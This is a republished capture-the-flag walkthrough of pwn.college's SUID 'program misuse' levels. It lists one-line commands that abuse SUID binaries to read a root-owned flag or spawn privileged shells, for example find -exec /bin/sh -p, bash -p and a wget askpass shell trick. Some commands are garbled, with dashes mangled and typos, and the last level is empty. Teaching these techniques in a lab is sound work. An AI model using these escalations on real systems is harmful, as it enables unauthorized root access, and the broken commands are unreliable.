Pwn College — Program Misuse & Privilege Escalation | 2024
2024-2-12 19:48:35 Author: infosecwriteups.com(查看原文) 阅读量:3 收藏

How to Read Sensitive Files with SUID set on the Commands and How to Escalate Privilege

Karthikeyan Nagaraj

InfoSec Write-ups

pwn.college is an online platform that offers training modules for cybersecurity professionals. It helps students and others learn about and practice core cybersecurity concepts.

Pwn.college is an education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. In martial arts terms, it is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. Our philosophy is “practice makes perfect”.

The platform is maintained by an awesome team of hackers at Arizona State University. It powers much of ASU’s cybersecurity curriculum, and is open, for free, to participation for interested people around the world!

Level 1 — If SUID bit on /usr/bin/cat

The ‘cat’ command is commonly used to display the contents of a file. In this scenario, the SUID bit is set for ‘cat,’ enabling us to read the /flag file, which the root user owns

cat /flag

Level 2: If SUID bit on /usr/bin/more

The ‘more’ command is used to view the contents of a file page by page. In this case, we attempt to read the /flag file, leveraging the SUID bit set on ‘more’ and accessing a file owned by root

more /flag

Level 3: If SUID bit on /usr/bin/less

Similar to ‘more,’ ‘less’ is a command-line pager for viewing files interactively. Here, we aim to read the /flag file using ‘less’ with the SUID bit set, dealing with a file owned by root.

less /flag

Level 4: If SUID bit on /usr/bin/head

The ‘head’ command is employed to display the initial lines of a file. In this context, we try to read the /flag file with the SUID bit set on ‘head,’ accessing a file owned by root

head /flag

Level 5: If SUID bit on /usr/bin/tail

Used to display the last few lines of a file, the ‘tail’ command is applied here to read the contents of the /flag file. The SUID bit is set for ‘tail,’ facilitating access to a file owned by root

tail /flag

Level 6: If SUID bit on /usr/bin/sort

Sorting the lines of a file is a common task with the ‘sort’ command. Attempting to read the /flag file, we utilize the SUID bit set for ‘sort’ while dealing with a file owned by root.

sort /flag

Level 7: If SUID bit on /usr/bin/vim

The ‘vim’ text editor is invoked to open and edit files. In this case, we open the /flag file using ‘vim’ with the SUID bit set, aiming to access a file owned by root.

vim /flag

Level 8: If SUID bit on /usr/bin/emacs

As a powerful text editor, ‘emacs’ is used here to open and modify files. We try to read the /flag file using ‘emacs’ with the SUID bit set, addressing a file owned by root

emacs /flag
p

Level 9: If SUID bit on /usr/bin/nano

Offering a user-friendly text editor, ‘nano’ is utilized to open and edit files. In this instance, we attempt to read the /flag file using ‘nano’ with the SUID bit set, interacting with a file owned by root.

nano /flag

Level 10: If SUID bit on /usr/bin/rev

Reversing the content of a file is achieved with the ‘rev’ command. Here, we attempt to reverse the /flag file’s content 2 times using ‘rev’ with the SUID bit set, interacting with a file owned by root.

rev /flag | rev

Level 11: If SUID bit on /usr/bin/od

The ‘od’ command displays the octal dump of a file. Trying to read the /flag file, we use ‘od’ with the SUID bit set, interacting with a file owned by the root.

od /flag

Level 12: If SUID bit on /usr/bin/hd

For a hexadecimal dump of a file, the ‘hd’ command is employed. In this scenario, we aim to read the /flag file using ‘hd’ with the SUID bit set, dealing with a file owned by root

hd /flag

Level 13: If SUID bit on /usr/bin/xxd

Generating a hexadecimal dump with line annotations, ‘xxd’ is used here to read the /flag file. The SUID bit is set for ‘xxd,’ allowing access to a file owned by root.

xxd /flag

Level 14: If SUID bit on /usr/bin/base32

Base32 encoding and decoding is performed with the ‘base32’ command. Here, we Encode and decode the /flag file to read the contents.

base32 /flag | base32 -d

Level 15: If SUID bit on /usr/bin/base64

Base64 encoding and decoding is performed with the ‘base64’ command. Here, we Encode and decode the /flag file to read the contents.

base64 /flag | base64 -d

Level 16: If SUID bit on /usr/bin/split

The ‘split’ command is used to split the Files. We are splitting the output of files into another file and viewing it through ‘cat’ command

split /flag
ls
cat FILENAME_THAT_IS_GENERATED

Level 17: If SUID bit on /usr/bin/gzip

‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents.

gzip -c /flag | gzip -d

Level 18: If SUID bit on /usr/bin/bzip2

‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents.

bzip2 -c /flag | bzip2 -d

Level 19: If SUID bit on /usr/bin/zip

Creating a zip archive of a file is achieved with the ‘zip’ command. Attempting to create a zip archive of the /flag file, we use ‘zip’ with the SUID bit set, accessing a file owned by root.

zip flag.zip /flag && cat flag.zip

Level 20: If SUID bit on /usr/bin/tar

The ‘tar’ command is used to create and manipulate tar archives. Here, we attempt to create a tar archive of the /flag file using ‘tar’ with the SUID bit set, dealing with a file owned by root.

tar -cf flag.tar /flag && cat flag.tar

Level 21: If SUID bit on /usr/bin/ar

Creating and managing ar archives is done with this command. We try to create an ar archive of the /flag file, utilizing the SUID bit set for ‘ar’ and accessing a file owned by root.

F=$(mktemp -u) && ar r “$F” /flag && cat “$F”

Level 22: If SUID bit on /usr/bin/cpio

The ‘find’ command locates files, and ‘cpio’ is used for archive creation. We attempt to create a cpio archive of the /flag file using ‘find’ and ‘cpio’ with the SUID bit set, dealing with a file owned by root.

find /flag | cpio -o > flag.cpioio && cat flag.cpio

Level 23: If SUID bit on /usr/bin/genisoimage

For creating ISO images, the ‘genisoimage’ command is used. In this case, we attempt to create an ISO image with the /flag file using ‘genisoimage’ with the SUID bit set, interacting with a file owned by root

genisoimage -sort /flag

Level 24: If SUID bit on /usr/bin/env

“The ‘env’ command sets the environment for a command. Here, we use ‘env’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, accessing a file owned by root

env cat /flag

Level 25: If SUID bit on /usr/bin/find

The ‘find’ command is employed with the ‘exec’ option to execute commands on found files. We attempt to execute a shell with root privileges and display the /flag file after gaining root access.”

find . -exec /bin/sh -p \; 
cat /flag

Level 26: If SUID bit on /usr/bin/make

The ‘make’ command builds and maintains programs. In this case, we use ‘make’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root

make -s — eval=$’x:\n\t-’”cat /flag”

Level 27: If SUID bit on /usr/bin/nice

The ‘nice’ command alters the scheduling priority of a command. Trying to execute ‘cat’ with an increased priority, we aim to display the /flag file with the SUID bit set, accessing a file owned by root.

nice cat /flag

Level 28: If SUID bit on /usr/bin/timeout

The ‘timeout’ command sets a time limit on the execution of a command. Here, we use ‘timeout’ to limit the execution of ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root

timeout 1 cat /flag

Level 29: If SUID bit on /usr/bin/stdbuf

The ‘stdbuf’ command adjusts buffering options for a command. In this instance, we use ‘stdbuf’ to run ‘cat’ with unbuffered input, attempting to display the contents of the /flag file with the SUID bit set, and accessing a file owned by root.

stdbuf -i0 cat /flag

Level 30: If SUID bit on /usr/bin/setarch

The ‘setarch’ command sets the architecture for a command. Trying to display the contents of the /flag file, we use ‘setarch’ to execute ‘cat’ with the SUID bit set, interacting with a file owned by root

setarch $(arch) cat /flag

Level 31: If SUID bit on /usr/bin/watch

The ‘watch’ command repeats a command at specified intervals. Here, we use ‘watch’ to repeatedly execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root.

watch -x cat /flag

Level 32: If SUID bit on /usr/bin/socat

Socat is a versatile relay tool. Attempting to transfer and display the contents of the /flag file, we use ‘socat’ with the SUID bit set, dealing with a file owned by root.

socat -u /flag -

Level 33: If SUID bit on /usr/bin/whiptail

Whiptail is a dialog box-driven interface. Here, we use ‘whiptail’ to display the contents of the /flag file in a dialog box with specified dimensions, dealing with a file owned by root

whiptail — textbox /flag 10 30

Level 34: If SUID bit on /usr/bin/awk

The ‘awk’ command is used for pattern scanning and processing. In this scenario, we try to use ‘awk’ to display the contents of the /flag file.

awk “//” /flag

Level 35: If SUID bit on /usr/bin/sed

The ‘sed’ command is a stream editor. Here, we attempt to use ‘sed’ to display the contents of the /flag file

sed ‘’ /flag

Level 36: If SUID bit on /usr/bin/ed

he ‘ed’ editor is employed for line-oriented text editing. Trying to use ‘ed’ to print the contents of the /flag file

ed /flag CN

#Then type p to print flag and q to quit

Level 37: If SUID bit on /usr/bin/chown

The ‘chown’ command changes file ownership. Here, we attempt to change the ownership of the /flag file to ‘hacker’ and display its contents

chown hacker /flag && cat /flag

Level 38: If SUID bit on /usr/bin/chmod

The ‘chmod’ command modifies file permissions. In this instance, we attempt to change the permissions of the /flag file to allow read and write access for all users, and then display its contents

chmod 666 /flag && cat /flag 

Level 39: If SUID bit on /usr/bin/cp

Copying the /flag file to the current directory is done with the ‘cp’ command. We try to copy the /flag file without the permissions.

cp — no-preserve=all /flag . && cat flag

Level 40: If SUID bit on /usr/bin/mv

The ‘mv’ command is used to move (rename) files. Here we are moving the code of ‘cat’ to the ‘mv’ tool. Now, if we use the ‘mv’ command it will display the contents of the file like ‘cat’.

Then we are running the /challenge/babysuid_level40 to set SUID on mv and we can read the contents of the /flag file.

mv /usr/bin/cat /usr/bin/mv || ./challenge/babysuid_level40 || mv /flag | grep pwn.college{

Level 41: If SUID bit on /usr/bin/perl

The ‘perl’ command is used for text processing. Here, we attempt to use ‘perl’ to display the contents of the /flag file.

perl -pe ‘END { close ARGV }’ /flag

Level 42: If SUID bit on /usr/bin/python

We are trying to run /flag file with python, which throws an error that contains the flag string.

You can also try to write a program that reads the content of the /flag file.

python /flag

Level 43: If SUID bit on /usr/bin/ruby

Creating and running a Ruby script to display the contents of the /flag file is done here with ‘echo’ and ‘ruby’

echo “puts File.read(‘/flag’)” >> a.rb && ruby a.rb CN

Level 44: If SUID bit on /usr/bin/bash

Executing bash with privileged mode is attempted here. After that, we try to use ‘cat’ to display the contents of the /flag file

bash -p CN then cat /flag

Level 45: If SUID bit on /usr/bin/date

The ‘date’ command is typically used for displaying or setting the system date and time. Here, we attempt to use ‘date’ to display the contents of the /flag file. We have to input a datefile for this command but if we give wrong file it will throw an error with the contents of the file.

date -f /flag 

Level 46: If SUID bit on /usr/bin/dmesg

The ‘dmesg’ command displays kernel messages. Here, we attempt to use ‘dmesg’ to display the contents of the /flag file

dmesg -F /flag 

Level 47: If SUID bit on /usr/bin/wc

The ‘wc’ command is used for word counting. Here, we try to use ‘wc’ to count words in the /flag file specified in a null-terminated list

wc — files0-from=/flag

Level 48: If SUID bit on /usr/bin/gcc

The ‘gcc’ command is a compiler for programming languages. In this scenario, we attempt to preprocess the /flag file using ‘gcc’ with specific flags

gcc -x c -E /flag 

Level 49: If SUID bit on /usr/bin/as

The ‘as’ command is an assembler for programming languages. Here, we try to use ‘as’ to assemble the /flag file to display its contents

as /flag 

Level 50: If SUID bit on /usr/bin/wget

This command creates a temporary executable script file using mktemp, sets execute permissions, and writes a simple shell script into it. The script is designed to execute /bin/sh with a specific set of options. Finally, it uses wget to download a file, passing the created script as the askpass program, allowing for potential privilege escalation or unauthorized access.

Then we can read the /flag file using cat /flag

F=$(mktemp) && chmod +x $F && echo -e ‘#!/bin/sh -p\n/bin/sh -p 1>&0’ >$F && wget — use-askpass=$F 0
cat /flag

Level 51: If SUID bit on /usr/bin/ssh-agent

A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups

Telegram Channel for Free Ethical Hacking Dumps

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng


文章来源: https://infosecwriteups.com/pwn-college-program-misuse-privilege-escalation-2024-3cedcecb2dd0?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh